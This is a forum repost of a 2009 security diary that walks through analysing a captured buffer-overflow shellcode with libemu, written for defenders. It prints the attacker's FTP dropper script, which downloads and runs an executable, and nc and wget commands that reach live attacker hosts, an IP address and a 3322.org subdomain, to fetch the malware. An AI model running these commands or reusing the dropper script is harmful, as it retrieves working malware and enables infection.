Microsoft Windows Vista Community Forums - Vistaheads
Recommended Download



Welcome to the Microsoft Windows Vista Community Forums - Vistaheads, YOUR Largest Resource for Windows Vista related information.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so , join our community today!

If you have any problems with the registration process or your account login, please contact us.

Driver Scanner

3322. org, (Sun, Jan 18th)

Security News






Speedup My PC
Reply
  #1 (permalink)  
Old 01-19-2009
Steve's Avatar
Moderator
 

Join Date: Sep 2006
Location: Emerald Isle
Posts: 87,819
Steve has a brilliant futureSteve has a brilliant futureSteve has a brilliant futureSteve has a brilliant futureSteve has a brilliant futureSteve has a brilliant futureSteve has a brilliant futureSteve has a brilliant futureSteve has a brilliant futureSteve has a brilliant futureSteve has a brilliant future
Thanks: 24
Thanked 176 Times in 44 Posts
3322. org, (Sun, Jan 18th)
Earlier today, an ISC reader sent us a looong capture of what looked like a buffer overflow attack. In between a lot of filler chars used to trigger the overflow was the code block below.

The obvious quesiton to ask in view of such an attack is what are they trying to do and was it successful. To help you answering these questions next time you find yourself on the receiving end of something like this, here's a quick walk-through on how we went about coming up with the answers.
1. Prune the capture to remove the part that is filler (iE all the kkkkllllll in the capture shown)
2. Convert the remaining capture into a binary file. Here's how I do it:

cat a.txt | cut -b 11-58 | perl -pe 's/(..)\s+/chr(hex($1))/ge' a.bin
The cut command strips out the address to the left and the printed characters to the right, and only leaves the HEX codes, which then are converted by the perl instruction into single byte characters and written into a file that I called a.bin
3. Next, use the sctest tool of libemu to try and make sense of the code block. Libemu doesn't always work on such code, but IF it works, it is doing such a stellar job that I'm always trying libemu/sctest first before loading the code into Ollydbg or Objdump for manual analysis. In this case, we're lucky: sctest makes quick work of the code, and we see that the connect function of WinSock is used to establish an outbound TCP connection on port 78.

$sctest -Sgs 10000 a.bin

success offset = 0x00000031

Hook me Captain Cook!

userhooks.c:127 user_hook_ExitThread

ExitThread(0)

stepcount 8189

[....]







) =

int connect (



struct sockaddr_in * name = 0x0041714a =

struct = {





struct in_addr sin_addr = {





char sin_zero =





[...]


4. Let's connect to the address and port that libemu so nicely revealed ... and lookie, we get an FTP script that downloads and starts an EXE from 3322.orrrg (org changed to orrrg to keep you from clicking :)

$nc 218.61.22.7 78

echo open a528.3322.orrrg1.txt

echo 29671.txt

echo 29671.txt

echo binary1.txt

echo get 2967.exe1.txt

echo bye1.txt

ftp -s:1.txt

2967.exe

2967.exe

2967.exe

del 1.txt

exit

^C
5. Next, we fetch the malware manually

$wget ftp://2967:2967@a528.3322.orrrg/2967.exe

[....]
6. Lastly, we analyze 2967.exe with tools like Virustotal (result) ThreatExpert (result) .

Thus, if this had been directed at a server of yours, you would now check the firewall log (IDS, flow log, etc) for an outbound connection attempt to port 78. If nothing is found, the exploit wasn't successful. If you see the connection to port 78 and it went through (for example because you allow all ports outbound) the next step is to check for the FTP. If the FTP completed as well, you know it is time to re-build that server.
And yes, adding the 3322-dot-org domain to your block list would be a good idea. As you can tell from this diary that we published in 2007, it is by far not the first time that this domain shows up on our malware radar ... and the ThreatExpert report included above contains yet another reason to zap this domain and all its subdomains.
Careful: All the badies are still live at this time, shoot your foot at your own risk.


More...
Reply With Quote
Sponsored Links
Reply


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is On
Trackbacks are On
Pingbacks are On
Refbacks are Off

Similar Threads
Thread Thread Starter Forum Replies Last Post
More about mass web infections, (Fri, Jan 18th) Steve Security News 0 01-18-2008 10:50
Email In the 18th Century Steve General Technology News 0 12-24-2007 00:50
Overzlobbed, (Sun, Nov 18th) Steve Security News 0 11-18-2007 22:11
Malware hosted on 3322.org AGAIN!, (Wed, Aug 15th) Steve Security News 0 08-15-2007 18:30
Oracle CPU, (Wed, Apr 18th) Steve Security News 0 04-18-2007 21:11




All times are GMT +1. The time now is 16:20.




Driver Scanner - Free Scan Now

Vistaheads.com is part of the Heads Network. See also XPHeads.com , Win7Heads.com and Win8Heads.com.


Design by Vjacheslav Trushkin for phpBBStyles.com.
Powered by vBulletin® Version 3.6.7
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.6.0 RC 2

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120